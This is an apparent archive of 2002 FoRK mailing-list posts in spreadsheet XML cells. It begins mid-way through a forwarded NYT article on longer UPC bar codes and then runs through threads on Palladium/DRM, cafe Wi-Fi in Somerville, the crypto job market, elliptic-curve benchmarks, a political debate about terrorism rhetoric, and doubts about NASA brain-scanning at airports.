of Coca-Cola, for example, will keep the same U.P.C., but a
zero will be added to the beginning of its bar-code number
in retailers' product databases. "The effect of the change in the U.P.C. code falls squarely
on retailers," said Mr. Friedman. He estimates that the
upgrade will cost at least $2 million for a chain of 100
stores with 10 checkout lanes a store. The expense will vary depending on the age of a retailer's
databases, software and hardware and whether it has to hire
outside consultants to make the change. Scanners and other
hardware bought more than three years ago will not read
longer codes and will have to be replaced. Software more
than five years old will also have to be scrapped. "Thank God we'd already planned to buy new equipment for a
lot of stores this year," said Richard S. Gilbert, director
of store systems at Duane Reade, a chain of 200 drugstores
in New York City. The stores have a total of 3,500 scanning
devices, each costing $1,000 to $2,500. As for the
cumbersome database modifications that need to be made, Mr.
Gilbert said: "Our consultants say they are working on it,
but they haven't gotten back to me with a plan. I still
don't know how big a deal it's all going to be." He might want to ask John Poss. Mr. Poss is the
merchandising coordinator for Ace Hardware, which has 5,100
stores and sells some 65,000 coded products. Ace overhauled
its computer systems to accept longer bar codes in 1999.
The company, based in Oak Brook, Ill., has retail outlets
in 70 countries and more than a hundred foreign suppliers. "It was such a struggle to get manufacturers to relabel
things for North America," Mr. Poss said, "and we wanted
the same system in place globally, so we decided to make
the change." The company hired a consultant, Cognizant Technology
Solutions, which is based in Teaneck, N.J., and is a
division of Dun &amp; Bradstreet. Ace's in-house team worked on
the project during the day while a Cognizant office in
India took over at night. Even so, the project took almost two years to plan and
carry out. In addition to equipment upgrades, modifications
had to be made in more than 500 software programs in
various company divisions (50 in distribution alone). The
most tedious and time-consuming part of the conversion, Mr.
Poss said, was making adjustments to databases. "Every
database in every division touches bar code information,
and they all needed to be reworked," he said. "It's like
Y2K, where you had to go in and expand fields and find
every reference to the date." Though Mr. Poss would not disclose the cost of the project,
he said the gains in efficiency and in suppliers' good will
had been "well worth the expense." His advice to other
retailers is to "get busy because you're facing an extreme
challenge." But moving to 13 digits may not be enough. The Universal
Code Council and EAN International, which formed an
alliance in 1996, strongly advise manufacturers and
retailers to go a step further and prepare their systems to
accommodate a 14-digit code. That is the length of a newly
patented bar code that takes up less space. Its reduced
size means that it can be affixed to small items like loose
produce, and the extra digits let a retailer keep track of
additional data like batch and lot numbers. That additional information would make product recalls
easier. "Today," Mr. Terwilliger said, "once a product is
taken out of the shipping container in the warehouse, you
really can't track it anymore." Shipping container bar codes are already 14 digits. The
different bar-code standards mean that retailers need
different computer systems for shipping and receiving,
inventory and sales. By adopting a 14-digit standard,
retailers should be able to put all the information into a
single database. Mr. Poss said Ace had added the capacity to scan and store
14 digits when it made its conversion three years ago. "Now
we can scan anything," he said, "whether it's in the
warehouse or at the register, and it immediately goes in to
a centralized system. No more sending data between
divisions." The cost and work of making the transition to 14 digits, he
said, was the same as it would have been for a change to 13
digits. Representatives from the standards groups said adopting a
14-digit structure - a step for which no date has been set
- could help streamline the sharing of data among all parts
of a retail operation. It would also make it possible, they
said, to identify products anywhere in the world at any
time during the trade process. "And to think it all started with pack of gum," Mr. Poss
said. http://www.nytimes.com/2002/08/12/technology/12CODE.html?ex=1030208144&amp;ei=1&amp;en=1b5705e7bd2048e6HOW TO ADVERTISE
---------------------------------
For information on advertising in e-mail newsletters 
or other creative advertising opportunities with The 
New York Times on the Web, please contact
onlinesales@nytimes.com or visit our online media 
kit at http://www.nytimes.com/adinfoFor general information about NYTimes.com, write to 
help@nytimes.com.  Copyright 2002 The New York Times Company
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Rohit forwards from the NYT:
&gt; Bigger Bar Code Inches Up on Retailers
&gt; August 12, 2002
&gt; By KATE MURPHY I can't imagine why they're inching forward through 
13- and then 14- digit extensions; seems they should
just leap ahead to something with real headroom, say
40-digit numbers (128 bits or more). How hard can it be to widen the glyph area and 
narrow the bars? The sensors have got to be tens
or even hundreds of times more accurate/robust 
than when barcodes first took off.One segment of the article along these lines:&gt; But moving to 13 digits may not be enough. The Universal
&gt; Code Council and EAN International, which formed an
&gt; alliance in 1996, strongly advise manufacturers and
&gt; retailers to go a step further and prepare their systems to
&gt; accommodate a 14-digit code. That is the length of a newly
&gt; patented bar code that takes up less space. Its reduced
&gt; size means that it can be affixed to small items like loose
&gt; produce, and the extra digits let a retailer keep track of
&gt; additional data like batch and lot numbers. A newly *patented* bar code, that merely fits 14 digits
into less space? I sure hope there's more to this
"invention" than "more lines, and narrower". They might as well go 2-D to fit in lots of extra bits,
which could also ease the transition to the capacity 
radio-transponder tags may offer.A bunch of info on different barcode standards, including
2-D variants, with examples is at:http://www.makebarcode.com/specs/speclist.htmlSomething very much like a 2-D barcode is Xerox "Dataglyphs":http://www.parc.com/solutions/dataglyphs/- Gordon
____________________   
Gordon Mohr  Bitzi CTO . . . describe and discover files of every kind. 
_ http://bitzi.com _ . . . Bitzi knows bits -- because you teach it!http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
How about a highly error corrected atomic level 3D encoding scheme that
relies on shape, colour and chemical make up to uniquely identify every
object in the universe.Objects uniquely identify themselves - theres no need for barcodes.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Sure, the *object* of a particular head of lettuce may be unique, but 
we're not tracking lettuce heads -- we're tracking the *idea* of a 
lettuce head in a capitalist system, an ownership relation.Besides, in the worst case, these damn object ID's aren't very 
compressible. Best representation of a unique head of lettuce I can 
think of is... that very head of lettuce.Of course, an accumulator is much easier to write, since the Pauli 
Exclusion Principle guarantees that adding a head of lettuce to a bin is 
an _atomic operation_:-)RohitOn Monday, August 12, 2002, at 09:56  PM, Damien Morton wrote:&gt;
&gt; How about a highly error corrected atomic level 3D encoding scheme that
&gt; relies on shape, colour and chemical make up to uniquely identify every
&gt; object in the universe.
&gt;
&gt; Objects uniquely identify themselves - theres no need for barcodes.
&gt;
&gt;
&gt; http://xent.com/mailman/listinfo/fork
&gt;
---
My permanent email address is khare@alumni.caltech.eduhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Gojomo:
&gt;How about a highly error corrected atomic level 3D encoding scheme that 
&gt;relies on shape, colour and chemical make up to uniquely identify every 
&gt;object in the universe. Objects uniquely identify themselves - theres no 
&gt;need for barcodes.That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research._________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; The most significant problem with TCPA and Palladium is not
&gt; whether they may interfere with the power of the universal
&gt; logic device, or whether they are effectual from the
&gt; standpoint of privacy and security concerns, though these
&gt; are all very important concerns.  Rather, the fundamental
&gt; problem they present is in the political premises that they
&gt; hope to implement for the sake of the "content industries."	I've been thinking about this sort of thing
	lately, and how the technological realization
	of these issues is one that enforces *absolute*
	control of content, where the original legal
	strictures (copyright) only enforced a limited
	time limited right to content.	What I'm wondering is this:  if you give
	people absolute control of copyright, whose
	works will be around in 100 years?  Because
	I'm starting to think that the content
	creator who wants to produce for posterity
	had better do it in such a way that the
	content is *not* "protected", or the content
	will be inaccessible to people in 15 years,
	much less 100.	This of course assumes that the content
	control mechanisms aren't so pervasive that
	one *cannot* create content without going
	through controlled channels.	-faisalhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
TCPA and Palladium: Content Control for the MassesWhile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works.*That's* the real game plan.TCPA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what's
really on the line.In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apply.The reason for this is essential and unavoidable, and must
be stated clearly and unequivocally at this juncture:
information is free.  It's not that it *wants* to be -- it
*is* and it always has been.  This fact is unassailable,
however, unless we let come to pass a world that subscribes
to "universal content control" for the sake of so-called
"moral rights" implemented at the behest of narrow content
industry interests.TCPA and Palladium are initiatives that hope to encourage
the general public, and more specifically producers of
information products in general, to identify content control
with "moral rights," blithely overlooking the real
implications of information technology in a free society,
and the long tradition of American jurisprudence upholding
the freedom intrinsic to information, a freedom on which the
prospects of information technology crucially depend.Seth Johnson-- [CC] Counter-copyright:
http://cyber.law.harvard.edu/cc/cc.htmlI reserve no rights restricting copying, modification or
distribution of this incidentally recorded communication. 
Original authorship should be attributed reasonably, but
only so far as such an expectation might hold for usual
practice in ordinary social discourse to which one holds no
claim of exclusive rights.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t>Strata just walked up to me in a cafe in Somerville, MA and
asked me how I was getting net here. And _then_ we figured out 
that we have shared context.        Jesse
-- 
jesse reed vincent -- root@eruditorum.org -- jesse@fsck.com 
70EBAC90: 2A07 FC22 7DB4 42C1 9D71 0108 41A3 3FB3 70EB AC90I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http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Thu, 2002-08-15 at 16:38, Jesse wrote:
&gt; Strata just walked up to me in a cafe in Somerville, MA and
&gt; asked me how I was getting net here. And _then_ we figured out 
&gt; that we have shared context.The obvious followup is 'there's a cafe in somerville with net access?'
Luis [19 Pitman St.]
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Or even "When did Somerville get the internet?"  ;-)ELuis Villa wrote:&gt;On Thu, 2002-08-15 at 16:38, Jesse wrote:
&gt;
&gt;&gt;Strata just walked up to me in a cafe in Somerville, MA and
&gt;&gt;asked me how I was getting net here. And _then_ we figured out 
&gt;&gt;that we have shared context.
&gt;&gt;
&gt;
&gt;The obvious followup is 'there's a cafe in somerville with net access?'
&gt;Luis [19 Pitman St.]
&gt;http://xent.com/mailman/listinfo/fork
&gt;
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>There was internet in Arleigh Beach Australia (see one end of town from
the other) 6 years ago.That is when I figured the Internet was truly global ...&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Elias
&gt; Sinderson
&gt; Sent: Thursday, August 15, 2002 2:01 PM
&gt; To: fork@spamassassin.taint.org
&gt; Subject: Re: It's a small world
&gt; 
&gt; Or even "When did Somerville get the internet?"  ;-)
&gt; 
&gt; E
&gt; 
&gt; Luis Villa wrote:
&gt; 
&gt; &gt;On Thu, 2002-08-15 at 16:38, Jesse wrote:
&gt; &gt;
&gt; &gt;&gt;Strata just walked up to me in a cafe in Somerville, MA and
&gt; &gt;&gt;asked me how I was getting net here. And _then_ we figured out
&gt; &gt;&gt;that we have shared context.
&gt; &gt;&gt;
&gt; &gt;
&gt; &gt;The obvious followup is 'there's a cafe in somerville with net
access?'
&gt; &gt;Luis [19 Pitman St.]
&gt; &gt;http://xent.com/mailman/listinfo/fork
&gt; &gt;
&gt; 
&gt; 
&gt; http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Short version:
T-Mobile Broadband is in the process of wiring every starbucks in the area
(T1 backhauled to some ~local POP + 802.11) as part of what I'm told is a
national rollout. The Diesel is close enough to the Elm St starbucks for me
to get reasonable net throughout most of the cafe. The rumor is that they'll be announcing that they've got boston covered on
the 21st.  I've heard from at least one source that they're actually going
to announce a much wider national rollout at that time.  It's not cheap [1], but
for soemone like me who's running a ~virtual corporation, it's well worth it.[1] https://accounts.tmobilebroadband.com/net_offers_promos.htmOn Thu, Aug 15, 2002 at 04:51:07PM -0400, Luis Villa wrote:
&gt; On Thu, 2002-08-15 at 16:38, Jesse wrote:
&gt; &gt; Strata just walked up to me in a cafe in Somerville, MA and
&gt; &gt; asked me how I was getting net here. And _then_ we figured out 
&gt; &gt; that we have shared context.
&gt; 
&gt; The obvious followup is 'there's a cafe in somerville with net access?'
&gt; Luis [19 Pitman St.]
&gt; http://xent.com/mailman/listinfo/fork
&gt; -- 
jesse reed vincent -- root@eruditorum.org -- jesse@fsck.com 
70EBAC90: 2A07 FC22 7DB4 42C1 9D71 0108 41A3 3FB3 70EB AC90autoconf is your friend until it mysteriously stops working, at which 
point it is a snarling wolverine attached to your genitals by its teeth
 (that said, it's better than most of the alternatives)  -- Nathan Mehl
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Thu, 2002-08-15 at 17:35, Jesse wrote:
&gt; Short version:
&gt; T-Mobile Broadband is in the process of wiring every starbucks in the area
&gt; (T1 backhauled to some ~local POP + 802.11) as part of what I'm told is a
&gt; national rollout. The Diesel is close enough to the Elm St starbucks for me
&gt; to get reasonable net throughout most of the cafe. 
&gt; 
&gt; The rumor is that they'll be announcing that they've got boston covered on
&gt; the 21st.  I've heard from at least one source that they're actually going
&gt; to announce a much wider national rollout at that time.  It's not cheap [1], but
&gt; for soemone like me who's running a ~virtual corporation, it's well worth it.
&gt; 
&gt; [1] https://accounts.tmobilebroadband.com/net_offers_promos.htmVery nice. Not sure it's worthwhile to pay for that when I'm already
paying for cable modem at home, but... still nice to know I have the
option.FWIW, slummerville actually has the internet- not just broadband, but
actual broadband competition, which I gather is rare. I had ADSL and two
cable options when I moved in.Luis
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
On Thu, Aug 15, 2002 at 05:46:55PM -0400, Luis Villa wrote:
&gt; FWIW, slummerville actually has the internet- not just broadband, but
&gt; actual broadband competition, which I gather is rare. I had ADSL and two
&gt; cable options when I moved in.
Did you actually attempt to order the DSL? Large chunks of somerville have
advertised DSL service that can't actually be obtained. Excuses vary, from
"no available copper" to "full DSLAM", but the folks I know who've wanted
DSL around here have all failed, ending up either with ATTBB, RCN or an
honest-to-god T1.        -j
&gt; 
&gt; Luis
&gt; -- 
jesse reed vincent -- root@eruditorum.org -- jesse@fsck.com 
70EBAC90: 2A07 FC22 7DB4 42C1 9D71 0108 41A3 3FB3 70EB AC90This is scary.  I'm imagining tracerouting you and seeing links like "Route
84" and "Route 9, Exit 14".  Obviously, this is illness induced. 
								--Cana McCoy
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Thu, 2002-08-15 at 17:53, Jesse wrote:
&gt; 
&gt; On Thu, Aug 15, 2002 at 05:46:55PM -0400, Luis Villa wrote:
&gt; &gt; FWIW, slummerville actually has the internet- not just broadband, but
&gt; &gt; actual broadband competition, which I gather is rare. I had ADSL and two
&gt; &gt; cable options when I moved in.
&gt; 
&gt; 
&gt; Did you actually attempt to order the DSL? Large chunks of somerville have
&gt; advertised DSL service that can't actually be obtained. Excuses vary, from
&gt; "no available copper" to "full DSLAM", but the folks I know who've wanted
&gt; DSL around here have all failed, ending up either with ATTBB, RCN or an
&gt; honest-to-god T1.No. My past experiences with DSL have generally been miserable so I went
with at&amp;t digital cable[1] + cable modem. Still, even the hypothetical
option was a lot better than what I had in the theoretically
tech-friendly Triangle in NC.
Luis[1]sports junkie
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>OK, this site rocks...http://www.nal.usda.gov/fnic/foodcomp/Data/SR15/sr15.htmlYou are what you eat :)- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.comhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Thu, 15 Aug 2002, Adam L. Beberg wrote:--]You are what you eat :)Thus we are what Alton Brown tells us we are.Food Heat BROWNall praises and braises.-tom
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>-- 
-- Eugen* Leitl leitl
______________________________________________________________
ICBMTO: N48 04'14.8'' E11 36'41.2'' http://eugen.leitl.org
83E5CA02: EDE4 7193 0833 A96B 07A7  1A88 AA58 0E89 83E5 CA02
---------- Forwarded message ----------
Date: Fri, 16 Aug 2002 02:23:05 +0100
From: Adam Back 
To: Cryptography 
Cc: Cypherpunks , Adam Back 
Subject: employment market for applied cryptographers?On the employment situation... it seems that a lot of applied
cryptographers are currently unemployed (Tim Dierks, Joseph, a few
ex-colleagues, and friends who asked if I had any leads, the spate of
recent "security consultant" .sigs, plus I heard that a straw poll of
attenders at the codecon conference earlier this year showed close to
50% out of work).Are there any more definitive security industry stats?  Are applied
crypto people suffering higher rates of unemployment than general
application programmers?  (From my statistically too small sample of
acquaintances it might appear so.)If this is so, why is it?- you might think the physical security push following the world
political instability worries following Sep 11th would be accompanied
by a corresponding information security push -- jittery companies
improving their disaster recovery and to a lesser extent info sec
plans.- governments are still harping on the info-war hype, national
information infrastructure protection, and the US Information Security
Czar Clarke making grandiose pronouncements about how industry ought
to do various things (that the USG spent the last 10 years doing it's
best to frustrate industry from doing with it's dumb export laws)- even Microsoft has decided to make a play of cleaning up it's
security act (you'd wonder if this was in fact a cover for Palladium
which I think is likely a big play for them in terms of future control
points and (anti-)competitive strategy -- as well as obviously a play
for the home entertainment system space with DRM)However these reasons are perhaps more than cancelled by:- dot-com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 software security related contract employees laid off ahead of
full-timers?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ASN.1 and adoption
of broken over complex and ill-defined ITU standards X.500, X.509
delayed deployment schedules by order of magnitude over what was
strictly necessary and contributed to interoperability problems and I
think significantly to the flop of PKI -- if it's that hard because of
the broken tech, people will just do something else.)- custom crypto and security related software development is perhaps
weighted towards dot-coms that just crashed.- big one probably: lack of measurability of security -- developers
with no to limited crypto know-how are probably doing (and bodging)
most of the crypto development that gets done in general, certainly
contributing to the crappy state of crypto in software.  So probably
failure to realise this issue or perhaps just not caring, or lack of
financial incentives to care on the part of software developers.
Microsoft is really good at this one.  The number of times they
re-used RC4 keys in different protocols is amazing!
Other explanations?  Statistics?  Sample-of-one stories?Adam
--
yes, still employed in sofware security industry; and in addition have
been doing crypto consulting since 97 (http://www.cypherspace.net/) if
you have any interesting applied crypto projects; reference
commissions paid.http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Robert Harley writes:
&gt; Here are some numbers with the new algorithm for counting points on
&gt; elliptic curves (over fields of characteristic 2).
&gt; 
&gt; In 1998, Reynald Lercier set a record at 1663 bits in 330 days of CPU
&gt; on 266 MHz Alphas.  In 1999, Frederik Vercauteren set a record at 1999
&gt; bits in 65 days of CPU on 400 MHz PCs.
&gt; 
&gt; I've been working on the problem since then.  These were measured just
&gt; now on Rajit's 750 MHz Alpha:
&gt; 
&gt;   1009 bits:
&gt;     Lift:  4.8 s + 0.64 s precomputation.
&gt;     Norm:  2.6 s + 0.31 s precomputation.
&gt; 
&gt;   1663 bits:
&gt;     Lift: 18.5 s + 2.1 s precomputation.
&gt;     Norm:  7.0 s + 1.9 s precomputation.
&gt; 
&gt;   1999 bits:
&gt;     Lift: 29.4 s + 3.6 s precomputation.
&gt;     Norm: 16.6 s + 3.4 s precomputation.
&gt; 
&gt;   15013 bits:
&gt;     Lift: 1 h 39 m + 13 m precomputation
&gt;     Norm: 39 m + 1 h 41 m precomputationNot knowing one whit about elliptic curve math, can you provide 
some expert interpretation of these results?It looks like the old record for, say, 199 bits, has been
blown out of the water by a factor of ~100,000.Does this mean that Eliptic Curve encryption is
now easily breakable? Or faster than before with
no loss in strength? Or stronger?Raw bits are OK, cooked bits are better.- Gordon
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Here are some numbers with the new algorithm for counting points on
elliptic curves (over fields of characteristic 2).In 1998, Reynald Lercier set a record at 1663 bits in 330 days of CPU
on 266 MHz Alphas.  In 1999, Frederik Vercauteren set a record at 1999
bits in 65 days of CPU on 400 MHz PCs.I've been working on the problem since then.  These were measured just
now on Rajit's 750 MHz Alpha:  1009 bits:
    Lift:  4.8 s + 0.64 s precomputation.
    Norm:  2.6 s + 0.31 s precomputation.  1663 bits:
    Lift: 18.5 s + 2.1 s precomputation.
    Norm:  7.0 s + 1.9 s precomputation.  1999 bits:
    Lift: 29.4 s + 3.6 s precomputation.
    Norm: 16.6 s + 3.4 s precomputation.  15013 bits:
    Lift: 1 h 39 m + 13 m precomputation
    Norm: 39 m + 1 h 41 m precomputation
Bye,
  Rob.
     .-.                    Robert.Harley@argote.ch                    .-.
    /   \           .-.      Software Development       .-.           /   \
   /     \         /   \       .-.     _     .-.       /   \         /     \
  /       \       /     \     /   \   / \   /   \     /     \       /       \
 /         \     /       \   /     `-'   `-'     \   /       \     /         \
            \   /         `-'       ArgoTech      `-'         \   /
             `-'                http://argote.ch/              `-'
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
Wasn't the Aztec population that greeted Cortez already largely
decimated by the microbiology brought over by DeSoto nearly a hundred
years before?-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; "b" == bitbitch   writes:    b&gt; My only problem with this article ...I know I'll get my share of flames for saying so, but my only problem
with this article is that it is some of the scariest subtext hate-lit
propaganda I've seen come out of the US since the March of Tears, and
twice scarier that it is not seen as such.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Hello Gary,Oh I don't know if I'd go to the point of 'hate lit' -- Its an
interesting, albiet a bit troubling theory.   Its not touchy-feely,
nor liberal friendly, but I wouldn't necessary say hate lit.
&gt;&gt;&gt;&gt;&gt;&gt; "b" == bitbitch   writes:GLM&gt;     b&gt; My only problem with this article ...GLM&gt; I know I'll get my share of flames for saying so, but my only problem
GLM&gt; with this article is that it is some of the scariest subtext hate-lit
GLM&gt; propaganda I've seen come out of the US since the March of Tears, and
GLM&gt; twice scarier that it is not seen as such.
-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; "b" == bitbitch   writes:    b&gt; .. I wouldn't necessary say hate lit.Hate-lit rests on a premise that "them" are fundamentally different
critters from "us" and thus, by being "them-like" they, as a
classification, "bring it on themselves" for us to "correct" them by
any means gruesome we might choose, after all, it's not /us/ pulling
the trigger, it's "them", right?  I've heard Bush say this (verbatim)
more than once, and with a straight face.Call it gay-bashing or whatever, it's convenient tunnel-vision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fear-charged words)"Make no mistake about it" it oozes rhetorical vehicles to obfuscate
it's lack of bits paragraph after paragraph in pushing an agenda to
/excuse/ "our" violence and suspension of human rights to 'clense'
ourselves of "them", the 'non-human' (or lesser-human) objects of its
hate.What else shall we call it?  Just anti-liberal?  Better question: What if, as in physics, the laws of human behaviour
are the same everywhere in the Universe?  What if Al Queda is in fact
more like our mafia or biker gangs or school board trustees? What if they operate by the same neural-annealing Maxima-Minima
gratification mechanisms as you or I and every other creature on this
planet?  What if, instead of magically and uniquely alien, they are, just like
our own captains and leaders, really only in it for the money, for
trade rights-of-way and for power over minions who will foolishly make
it all happen, minions whom they can once again dup with /virtually/
/identical/ rhetoric ... except we call theirs "fundamentalist islam",
and they call ours "imperialist satanism"?When both sides can call the other "evil" to the cheers of their local
public and media, you can bet something's rotten in the state of Denmark.I guess that's why I live in the woods.  Bears and racoons I
understand, but I really just don't 'get' people.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>-----Original Message-----
From: Damien Morton [mailto:damien.morton@acm.org] 
Sent: Saturday, 17 August 2002 02:55
To: 'polrev@hoover.stanford.edu'
Subject: Re: Al Qaeda's Fantasy Ideology
Youre right of course - the attack was performed for its effect on
muslims, not for its effect on the US. By showing that it can be done,
they inspire others to follow in their path, or so they hope.I take some objection to the belabouring of the term fantasy, because it
is somewhat perjorative. Imagining different worlds can often lead the
world to become more like that imagined. Moreso if action is taken on
the basis of those imaginings.Theres an interesting parralel with the great capitalist dream that
anyone can make anything happen through hard work and a bit of luck.
This is equally a fantasy, but one made to approach reality through
consensus.An interesting question then becomes, if Al Queda's actions are in
furtherance of a fantasy, what fantasies are George Bush's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made?What cultural myopia is in play here in the US?I make a point of reading Australian, Britsish and US news. Today I
noticed that the Australian and British news are featuring the Iraqi
overtures to the UN on inspectors, while US news is featuring Iraqi war
preparations (digging bunkers etc).At a time that the US is withdrawing from international cooperation on
multiple levels, the fantasy of being surrounded by enemies (invisible
preferably) is somewhat appealing. A self fullfilling prophesy, if you
like. Perhaps that's whats at work here.http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Sat, Aug 17, 2002 at 01:51:25AM -0400, Gary Lawrence Murphy wrote:
&gt; Hate-litBy choosing that term you are certainly attempting to frame the debate by
choosing a fear-charged word.&gt; What if they operate by the same neural-annealing Maxima-Minima
&gt; gratification mechanisms as you or I and every other creature on this
&gt; planet?  If somebody maximizes their gratification by slaughtering people, we
shouldn't just try to understand them. We should try to stop them. You
seem to have forgotten this in your moral relativism. Everybody is
justified in their own head. This doesn't mean we forgive mass murders,
or ignore their acts. They are still guilty and abhorrent. We do
understand them better when we see them as a flawed human being, like
any one of us.&gt; When both sides can call the other "evil" to the cheers of their local
&gt; public and media, you can bet something's rotten in the state of Denmark.Calling "the other side" evil is a time-honored tradition. It is less 
of a stepping point for an analysis of the situation than it is for an
analysis of human nature in general.&gt; I guess that's why I live in the woods.  Bears and racoons I
&gt; understand, but I really just don't 'get' people.People require a touch more effort.-- 
njl
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Sounds like the "brain fingerprinting" touted by Steve Kirsch 
last October...   http://www.skirsch.com/politics/plane/ultimate.htmThe commercial firm may very well be "Human Brain Research
Labs, Inc."...   http://www.brainwavescience.com/- Gordon----- Original Message ----- 
From: "Chris Arkenberg" 
To: 
Sent: Saturday, August 17, 2002 12:46 AM
Subject: NASA mindreading
&gt; NASA Plans to Read Terrorist's Minds at Airports
&gt; http://www.washtimes.com/national/20020817-704732.htm
&gt; 
&gt; This just strikes me as being so ridiculously bizarre. We are truly 
&gt; beginning to blur reality with science fiction. Makes me think of  Minority 
&gt; Report (although PKD realized this future decades ago). Especially 
&gt; concerning (or intriguing?) is the revelation that "the agency is 
&gt; developing brain-monitoring devices in cooperation with a commercial firm, 
&gt; which it did not identify".
&gt; 
&gt; http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>NASA Plans to Read Terrorist's Minds at Airports
http://www.washtimes.com/national/20020817-704732.htmThis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brain-monitoring devices in cooperation with a commercial firm, 
which it did not identify".http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Sat, 17 Aug 2002, Chris Arkenberg wrote:&gt; This just strikes me as being so ridiculously bizarre. We are truly If it strikes you as being ridiculously bizarre, you're probably right.  
Because it is ridiculous, and bizarre.&gt; beginning to blur reality with science fiction. Makes me think of  Minority No, rather a new breakthrough in ballistic snake oil delivery. So it's
built into a walkthrough gate, and is noninvasive. It's supposed to
analyse brain and heart activity. While you can pick up heartbeat by
Doppler radar, later tells it's realtime DSP on an array of SQIDs. Later
they mention they use passive IR imaging and eye saccade evaluation. Maybe
they're also doing a Kirlian reading, and recording your mana flux, too.
(Conclusive evaluation by entrail reading is nonoptional only for
confirmed terrorists).So they claim terrorist intent translates in biosignatures they can pick
up by close-distance passive telemetry, in realtime, with a very low
number of false positives, while having no chance to calibrate, in the
field.Right.Seems somebody is so awfully eager to pick up a slice of research grant
pie from the heimatland securitate money they haven't even bothered to 
invent a plausible lie.http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
GLM&gt; Hate-lit rests on a premise that "them" are fundamentally different
GLM&gt; critters from "us" and thus, by being "them-like" they, as a
GLM&gt; classification, "bring it on themselves" for us to "correct" them by
GLM&gt; any means gruesome we might choose, after all, it's not /us/ pulling
GLM&gt; the trigger, it's "them", right?  I've heard Bush say this (verbatim)
GLM&gt; more than once, and with a straight face.Personally, I don't know where you got that from.  Here's how I
grokked the whole piece.   A theory (in this case, that fantasy was
the propagating force/drive?) behind a given act, that from those not
in the fantasy seems morally outrageous, repugnant or unjustified.
He listed many examples, oldies and goodies.   I don't think the
author meant to come off at the point that you seem to be
conjecturing -- that this is purely an 'other' offense.   I certainly
didn't read it that way, but it _did_ bother me that he did not
include some of the examples I listed, or as Damien? mentioned on an
earlier post, the whole collective fantasy of capitalism.GLM&gt; Call it gay-bashing or whatever, it's convenient tunnel-vision and
GLM&gt; lies to justify violence against a creature genetically, morally and
GLM&gt; intellectually indistinguishable from your sister.  Go ahead, peel the
GLM&gt; skin off a random daughter of each of them and lay them side by side
GLM&gt; on the pavement, and you tell me which one was racially guilty, which
GLM&gt; one carried the "infection" the "plague" (note, not the "antigen" or
GLM&gt; the "hormone", which have similar metaphoric effects to philosophy,
GLM&gt; but they chose the fear-charged words)This article never got into the bones &amp; blood of what humans are Gary.
  You're assuming too much, dearie.  His was all a psychological game.
I'd be willing to wager that, his point was merely psychological.
That there is a distinguishing characteristic (the fantasy) about
those who are perpetually deluded into a preconceived notion of how
the world needs to work -- his examples were very clear -- a
psychopathological individual and on a lesser extreme, the father who
fantasizes his son as a football player.   I kinda read 'levels' into
that distinguishing characteristic though.   Meaning, just because
you believe in the/a fantasy, does not mean necessarily that you're
going to be an evil terrorist.   It just means you're playing alittle
game in your head, and because of that you are a bit different from
the rest of the wavelengths floating around in the cosmos at that
moment.GLM&gt; "Make no mistake about it" it oozes rhetorical vehicles to obfuscate
GLM&gt; it's lack of bits paragraph after paragraph in pushing an agenda to
GLM&gt; /excuse/ "our" violence and suspension of human rights to 'clense'
GLM&gt; ourselves of "them", the 'non-human' (or lesser-human) objects of its
GLM&gt; hate.
I didn't read cleanse or nonhuman anywhere.   Mind telling me where
you saw those words?   Sure, I'll bite that the article had rhetoric.
I'll also bite that he wasn't fair entirely with his theory.   If he
meant it to be a universal (capable of including even the common
father with a football complex dream) he should have included our
delusions in all of this.   But honestly, where in the hell did you
get 'cleanse ourselves of 'them', the 'non-human' (or lesser-human)
